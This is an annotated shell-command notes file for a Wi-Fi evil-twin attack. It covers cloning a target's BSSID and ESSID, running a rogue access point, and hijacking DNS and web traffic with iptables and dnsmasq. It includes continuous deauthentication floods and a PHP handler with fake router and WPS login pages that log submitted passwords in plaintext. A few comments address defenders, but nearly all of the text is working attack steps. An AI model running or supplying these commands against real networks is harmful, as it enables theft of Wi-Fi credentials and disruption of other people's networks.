# List the host's network interfaces (symlinks under /sys/class/net), leaving
# out loopback.
find /sys/class/net/ -type l -print | grep -v "/lo$"
# Wireless interface used by every command below, and the name given to its
# monitor-mode companion ("<iface>mon"). ${VAR:?} makes the shell stop with an
# error when the variable is unset or empty, instead of running a command with
# a blank interface name. The expansions are unquoted throughout, so values
# containing whitespace would be word-split.
IFACE=wlan0
IFACEM=${IFACE:?}mon
# Snapshot of the interface as reported by `iw dev <iface> info`: operating
# mode ("type"), owning radio (printed as "phy<N>"), transmit power and MAC
# address. Each value is the second field of the first matching line(s).
IFACE_MODE="$(iw dev ${IFACE:?} info | awk '/type/ {print $2}')"
IFACE_PHY="$(iw dev ${IFACE:?} info | awk '/wiphy/ {print "phy"$2}')"
IFACE_TX="$(iw dev ${IFACE:?} info | awk '/txpower/ {print $2}')"
IFACE_MAC="$(iw dev ${IFACE:?} info | awk '/addr/ {print $2}')"
# Identifiers of the network referred to by the later commands: network name,
# AP MAC address, channel, and one client MAC. These are sample values;
# TARGET_CLIENT repeats the TARGET_BSSID value as written.
TARGET_ESSID='Home WaiFai'
TARGET_BSSID='A1:B2:C3:D4:E5:F6'
TARGET_CHANNEL='5'
TARGET_CLIENT='A1:B2:C3:D4:E5:F6'
# First three octets of the /24 used on the local side further down; later
# lines append ".1", ".10", ".250" and ".255" to it.
IFACE_IPADDR='192.168.0'
# --- Sequence 1: add a monitor-mode virtual interface next to ${IFACE} ---
# Clear any rfkill block, take the interface down, and set the regulatory
# domain, which bounds the channels and transmit power the driver will allow.
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
##iw ${IFACE:?} set txpower fixed 3000
##iwconfig ${IFACE:?} txpower 30
#iw ${IFACE:?} set monitor control
#airmon-ng check
#airmon-ng check kill
#airmon-ng start ${IFACE:?}
# Create "${IFACE}mon" as a monitor-type interface on the radio named in
# IFACE_PHY, then bring ${IFACE} back up.
iw phy ${IFACE_PHY:?} interface add ${IFACE:?}mon type monitor
ip link set dev ${IFACE:?} up
# --- Sequence 2: return ${IFACE} to managed (client) mode ---
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw reg set US # BO
iwconfig ${IFACE:?} mode managed
#iwconfig ${IFACE:?} mode ad-hoc
#iwconfig ${IFACE:?} channel 3
#iw set ${IFACE:?} type monitor #?
ip link set dev ${IFACE:?} up
# --- Sequence 3: remove an interface from the radio ---
# NOTE(review): as written this deletes ${IFACE} itself rather than the
# "${IFACE}mon" interface created in sequence 1 -- confirm which was meant.
rfkill unblock wifi
ip link set dev ${IFACE:?} down
iw dev ${IFACE:?} del
# Survey of nearby networks with bettercap on the monitor interface: start
# wifi.recon, set region and transmit power, and have the ticker clear the
# screen and re-run `wifi.show` every second. The table is limited to 13 rows,
# to networks with RSSI of at least -70, sorted by RSSI ascending, with the
# manufacturer column enabled.
bettercap -iface ${IFACEM:?} -eval 'wifi.recon on;wifi.region US;wifi.txpower 30;set wifi.show.limit 13;set wifi.rssi.min -70;set wifi.show.sort rssi asc;set wifi.show.manufacturer true;set ticker.period 1;set ticker.commands "clear;wifi.show";ticker on')
# -eval 'wifi.recon on;wifi.show')
## rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd # desc|asc
# wifi.interface ${IFACEM:?}
# set wifi.show.filter ^XX:XX
# The same survey with airodump-ng, filtered to networks using WPA encryption.
airodump-ng --encrypt WPA ${IFACEM:?}
# Set ${IFACE}'s MAC address to the TARGET_BSSID value; the interface is taken
# down for the change and brought back up afterwards.
# For defenders: the same BSSID showing up with a different channel, security
# setting or signal profile is what wireless-IDS duplicate-AP rules look for.
ip link set dev ${IFACE:?} down
macchanger --mac=${TARGET_BSSID:?} ${IFACE:?}
#macchanger -r ${IFACE:?}
ip link set dev ${IFACE:?} up
# OUI (MAC vendor prefix) lists: http://standards-oui.ieee.org/oui.txt and /usr/share/nmap/nmap-mac-prefixes
# NOTE(review): the vendor-lookup pipeline below was fused onto the comment
# line above in the original paste; it is kept commented out, unchanged.
# cat oui.txt | grep -i "$(printf "${TARGET_BSSID:?}" | tr -d ':' | head -c 6)" | cut -d')' -f2 | tr -d '\t'
# Advertise a software access point carrying TARGET_ESSID on TARGET_CHANNEL
# from the monitor interface.
# For defenders: a BSS that advertises the ESSID of a protected network but
# with different security parameters is a rogue-AP indicator.
airbase-ng -e "${TARGET_ESSID:?}" -c ${TARGET_CHANNEL:?} ${IFACEM:?}
#airbase-ng -c ${TARGET_CHANNEL:?} -a "${TARGET_BSSID:?}" -e "${TARGET_ESSID:?}" -W 1 ${IFACEM:?}
#sleep 2
#airbase-ng -e "${TARGET_ESSID:?} " -c 1 -L -W 1 ${IFACEM:?} # With the trailing space
# -Z # 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
# hostapd variant. The lines from interface= down to wmm_enabled= appear to be
# the intended contents of hostapd.conf, with the ${...} references standing
# for the values defined at the top of these notes -- TODO confirm.
nano hostapd.conf
interface=${IFACE:?}
channel=${TARGET_CHANNEL:?}
hw_mode=g
ssid=${TARGET_ESSID:?}
#bridge=br0
# No wpa= or passphrase settings appear in this file, so it describes an open
# (unencrypted) network using the target's ESSID and channel.
auth_algs=1
wmm_enabled=0
# Start hostapd with that file, writing its PID to hostapd.pid.
hostapd -P hostapd.pid hostapd.conf
# bettercap variant of the same step: configure wifi.ap with the ESSID, a
# BSSID and the channel, with encryption set to false, then start it.
bettercap -iface ${IFACEM:?} -eval "set wifi.ap.ssid '${TARGET_ESSID:?}';set wifi.ap.bssid ${TARGET_BSSIDX:?};set wifi.ap.channel ${TARGET_CHANNEL:?};set wifi.ap.encryption false;wifi.recon on; wifi.ap"
# Bring the AP-side interface up and assign it <prefix>.1/24.
ip link set dev ${IFACE:?} up
ip addr add ${IFACE_IPADDR:?}.1/24 broadcast ${IFACE_IPADDR:?}.255 dev ${IFACE:?}
# iptables || iptables-legacy
# modinfo nf_tables || modinfo ip_tables
# Delete every rule in the filter and nat tables.
# NOTE(review): this removes whatever filtering and NAT rules the host already
# had (chain policies are left as they were); save the ruleset first if the
# machine is used for anything else.
iptables --flush
iptables -t nat --flush
#iptables --table nat --append POSTROUTING --out-interface ${IFACE2:?} -j MASQUERADE
# Accept forwarding of packets that arrive on the wireless interface.
iptables --append FORWARD --in-interface ${IFACE:?} -j ACCEPT
# Rewrite the destination of client DNS (udp/53) and web traffic (tcp/80 and
# tcp/443) to the local address.
# NOTE(review): the first tcp/80 rule has no -i match, so it applies to
# traffic entering on every interface, not only ${IFACE}.
# tcp/443 is pointed at port 80, where only a plain-HTTP listener is started
# later in these notes; a TLS handshake cannot complete there, which is why
# HTTPS (and HSTS-pinned) sites show a connection error rather than a
# substituted page.
iptables -t nat -A PREROUTING -i ${IFACE:?} -p udp -m udp --dport 53 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:53
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 80 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
iptables -t nat -A PREROUTING -i ${IFACE:?} -p tcp -m tcp --dport 443 -j DNAT --to-destination ${IFACE_IPADDR:?}.1:80
# Source-NAT everything that leaves the host; no outgoing interface is given,
# so the rule is not limited to one uplink.
iptables -t nat -A POSTROUTING -j MASQUERADE
# Enable IPv4 forwarding, falling back to writing /proc directly if sysctl
# fails. The setting stays on until changed back or the host reboots.
sysctl net.ipv4.ip_forward=1 || echo 1 > /proc/sys/net/ipv4/ip_forward
# The lines from interface= down to the last address= entry appear to be the
# intended contents of dnsmasq.conf, with ${...} standing for the values
# defined at the top of these notes -- TODO confirm.
nano dnsmasq.conf
# Serve DHCP and DNS on the AP-side interface and address only.
interface=${IFACE:?}
#listen-address=127.0.0.1
listen-address=${IFACE_IPADDR:?}.1
#port=0
#bind-interfaces
# DHCP pool .10-.250 with 5-minute leases; option 3 (router) and option 6
# (DNS server) both hand out the local .1 address, so clients send all name
# lookups and routed traffic to this host.
dhcp-range=${IFACE_IPADDR:?}.10,${IFACE_IPADDR:?}.250,5m
dhcp-option=3,${IFACE_IPADDR:?}.1
dhcp-option=6,${IFACE_IPADDR:?}.1
# Upstream resolver for names that are not overridden below.
server=8.8.8.8
# Log every DNS query and DHCP transaction; ignore /etc/hosts.
log-queries
log-dhcp
no-hosts
dhcp-option=option:router,${IFACE_IPADDR:?}.1
dhcp-authoritative
# Answer these two domains (and their subdomains) with the local address.
# connectivitycheck.android.com is a hostname Android uses for its
# connectivity probe, so this presumably makes client devices treat the
# network as a captive portal and open the locally served page.
address=/gstatic.com/${IFACE_IPADDR:?}.1
address=/connectivitycheck.android.com/${IFACE_IPADDR:?}.1
# Run dnsmasq in the foreground with this file, logging to stderr, with its
# PID and lease files kept in the current directory.
dnsmasq -C dnsmasq.conf --log-facility=- -x dnsmasq.pid -l dnsmasq.leases -d # -k
#dnsspoof -i ${IFACE:?}
mkdir www.html
nano www.html/loading.html
Loading, please wait ...
nano www.html/post.php
<?php
// Form handler for the page's POST request.
// Sends a redirect to /loading.html, then appends every submitted field to
// usernames.txt as "name=value" lines, with a blank line after each
// submission. The values are stored as received, in plaintext.
header ("Location:/loading.html");
// Append mode: earlier submissions are kept.
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
nano www.html/index.html
<!DOCTYPE html>
<html>
<head>
<title>Sign www.html/index.htmlin</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,
initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
</head>
<body>
<p> Pulse el boton WPS en su Router o ingrese contrasena.</p>
<form method="post" action="post.php">
<!-- <input type="text" name="email" placeholder="Email" required> -->
<input type="password" name="password" placeholder="Password" required>
<button type="submit" name="submit">Sign in</button>
</form>
</body>
</html>
# Create the capture file, serve the www.html/ directory with PHP's built-in
# web server on the AP address, port 80, and follow the file as form
# submissions are appended to it.
# NOTE(review): usernames.txt lives inside the served directory, so the
# submitted passwords are kept in plaintext and the file can itself be
# requested over HTTP by any client on the network; account for that when
# storing and disposing of data collected during a test.
touch www.html/usernames.txt
php -S ${IFACE_IPADDR:?}.1:80 -t www.html/
tail -f www.html/usernames.txt
# Three tools for the same step: transmitting 802.11 deauthentication frames
# for TARGET_BSSID from the monitor interface. With aireplay-ng, `--deauth 0`
# keeps sending until interrupted; the commented variants add a single client
# address (-c) or repeat the bettercap command on a 3-second ticker.
# For defenders: deauthentication is an unauthenticated management frame
# unless Protected Management Frames (802.11w, mandatory in WPA3) are enabled,
# in which case clients discard forged ones. Sustained bursts of deauth frames
# for one BSSID are a standard wireless-IDS signature.
aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} ${IFACEM:?}
#aireplay-ng --ignore-negative-one --deauth 0 -a ${TARGET_BSSID:?} -c ${TARGET_CLIENT:?} ${IFACEM:?}
bettercap -iface ${IFACEM:?} -eval "wifi.deauth ${TARGET_BSSID:?}"
#bettercap -iface ${IFACEM:?} -eval "set ticker.period 3;set ticker.commands 'wifi.deauth ${TARGET_BSSID:?}';ticker on"
mdk3 ${IFACEM:?} -d -g -t ${TARGET_BSSID:?} -c ${TARGET_CHANNEL:?}
# Stop any running DHCP clients on the host (this affects every interface
# they manage, not only ${IFACE}).
killall dhclient dhcpcd
# The three ctrl_interface/update_config lines appear to be the intended
# contents of wpa_supplicant.conf. update_config=1 lets wpa_supplicant write
# configuration changes, including learned network settings, back to the file.
nano wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1
# Start wpa_supplicant on ${IFACE}, then request WPS push-button enrolment
# with any access point whose WPS button has been pressed; the author notes a
# window of roughly 120 seconds.
wpa_supplicant -c wpa_supplicant.conf -i ${IFACE:?}
wpa_cli -i ${IFACE:?} wps_pbc any # ~120sec
# Show the configuration file afterwards, which presumably now holds the
# network block saved by the enrolment.
# For defenders: WPS push-button hands the network credentials to whichever
# device asks during the window, so disabling WPS on the router closes this
# path regardless of passphrase strength.
cat wpa_supplicant.conf
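# https://github.com/bettercap/bettercap/releases/
# Let the dynamic loader also search /usr/local/lib and ./bettercaplib.
# ${LD_LIBRARY_PATH:+...} adds the ':' separator only when a value already
# exists: an empty entry in LD_LIBRARY_PATH is read as "current directory",
# so the previous ${LD_LIBRARY_PATH:-}: form made the loader pick up any
# shared library sitting in the working directory when the variable was unset.
# ${PWD} replaces ${pwd}, which is not a variable the shell sets and expanded
# to an empty string, turning the last entry into /bettercaplib.
export LD_LIBRARY_PATH="${LD_LIBRARY_PATH:+${LD_LIBRARY_PATH}:}/usr/local/lib:${PWD}/bettercaplib"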
# Identify the USB Wi-Fi adapter: print the lines of the verbose USB listing
# that contain "id" (vendor and product IDs among them).
lsusb -v | grep 'id'
# idVendor 0x148f Ralink Technology, Corp.
# idProduct 0x3070 RT2870/RT3070 Wireless Adapte
# Show which module file and firmware blobs the rt2800usb driver declares, and
# check whether the rt2870.bin blob is installed.
modinfo rt2800usb | grep -E "filename|firmware"
ls -l /lib/firmware/rt2870.bin
# https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git
# https://github.com/NXP/linux-firmware
# NOTE(review): the blob is fetched from the moving `master` branch of a
# GitHub mirror and installed into /lib/firmware with no checksum or signature
# check. The kernel loads this file onto the adapter, so a tampered or
# replaced blob is a supply-chain risk. Prefer the distribution's firmware
# package or the kernel.org linux-firmware tree listed above, fetch a fixed
# commit rather than a branch, and compare the file's hash with a trusted copy
# before moving it into place.
curl -L https://github.com/NXP/linux-firmware/raw/master/rt2870.bin -o rt2870.bin
mv rt2870.bin /lib/firmware
nano index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta charset='UTF-8'>
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="pragma" content="no-cache" />
<meta name="google" value="notranslate">
<script language="Javascript"> var TimeID; function timer() { window.clipboardData.clearData(); timeID = setTimeout('timer()', 100); } </script>
<style type="text/css">
TABLE { width:1200px }
a { font-size:18px; text-decoration:none; font-weight:bold; }
#bg-ffcolor { background-color:#FFFFFF; }
#bg-tcolor { background-color:#FBFCFC; }
#bg-color { background-color:#FDFFFF; }
/**/
#bg-bcolor { background-color:#9E1B32; }
#bg-fcolor { background-color:#191970; }
#ft-fcolor { color:#191970; }
</style>
</head>
<body onload="timer()" oncontextmenu="return false" ondragstart="return false" onselectstart="return false">
<TABLE id="bg-color" style="height:800px;position:absolute;top:0;bottom:0;left:0;right:0;">
<TR id="bg-bcolor" style="height:20px"><TD></TD></TR>
<TR id="bg-fcolor" style="height:10px"><TD></TD></TR>
<TR id="bg-ffcolor" style="height:100px">
<TD>
<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100px">
<TR VALIGN=bottom>
<TD VALIGN=MIDDLE ALIGN=CENTER style="height:100px;height:50%"><img style="height:95px" src="/static.png" alt="LOGO"/></TD>
<TD style="height:100px;width:600px"></TD>
<TD>
<TABLE style="height:100%;width:300px;">
<TR></TR>
<TR></TR>
<TR></TR>
<TR>
<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="width:100px;"><a style="color:#FFFFFF;" href="/index.html">Home</a></TD>
<TD VALIGN=MIDDLE ALIGN=CENTER id="bg-fcolor" style="whidth:100px;"><a style="color:#FFFFFF;" href="/">Login</a></TD>
<TD style="width:100px;"></TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD>
</TR>
<TR>
<TD>
<TABLE style="height:100%;width:100%">
<TR style="width:100%;">
<TD id="bg-ffcolor" style="width:15%;">
<TABLE CELLPADDING=0 CELLSPACING=10 style="height:100%;width:100%;">
<TR style="height:8%;"><TD></TD></TR>
<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/setup.html">Wireless Setup</a></TD></TR>
<TR ALIGN=CENTER style="height:8%;"><TD id="bg-fcolor"><a style="color:#FFFFFF;" href="/utils.html">Utilities</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/restart.html">Restart Router</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/wipe.html">Restore Factory</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Default">Default</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Save">Save/Backup Settings</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/backup.html#Restore">Restore Previus</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html">Settings</a></TD></TR>
<TR ALIGN=CENTER style="height:5%;"><TD><a style="color:#000000;" href="/settings.html#Sys">System Settings</a></TD></TR>
<TR><TD></TD></TR>
</TABLE>
</TD>
<TD ALIGN=CENTER VALIGN=top id="ft-fcolor" style="width:10%;font-weight:900;font-size:28px;">Login</TD>
<TD style="width:75%;">
<TABLE style="height:100%;width:100%">
<TR style="height:10%;"><TD></TD></TR>
<TR>
<TD COLSPAN=3 VALIGN=top id="bg-tcolor" style="height:20%;width:80%;">
<p style="font-weight:900;font-family:'Courier New'">To start or continue configuring the Router Modem, log in with a password. If you have not set up a password, leave this field blank and click 'Submit'.</p>
<p> ** Password is required!</p>
</TD>
<TD></TD>
</TR>
<form method="post" action="post.php">
<TR style="height:10%;">
<TD ALIGN=CENTER style="width:40%"><strong>Password</strong></TD>
<TD ALIGN=LEFT><input type="password" name="password" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required></TD>
</TR>
<TR VALIGN=top>
<TD ALIGN=RIGHT><button type="submit" name="submit">Submit</button></TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<center><p style="font-size:11px;">Firmware TS0705125C_012814 eSAFE 0 FW Revision 2.0.69_063C</p></center>
<center><p style="font-size:11px;">©2014 ARRIS Group. Inc. ALL RIGHTS RESERVED.</p></center>
<!--
<center><p style="font-size:11px;">Copyright © Huawei Technologies Co. Ltd. 2009-2014. All Rights Reserved.</p></center>
-->
</TD>
</TR>
</TABLE>
</body>
</html>
nano backup.html settings.html utils.html restart.html setup.html wipe.html
<!DOCTYPE html>
<html>
<head><meta http-equiv="refresh" content="1; url=/index.html"></head>
<body><p>TSK637::Pending Task.<p>
<p>AUTH:Failed - <a href="/index.html">Redirection</a></p></body>
</html>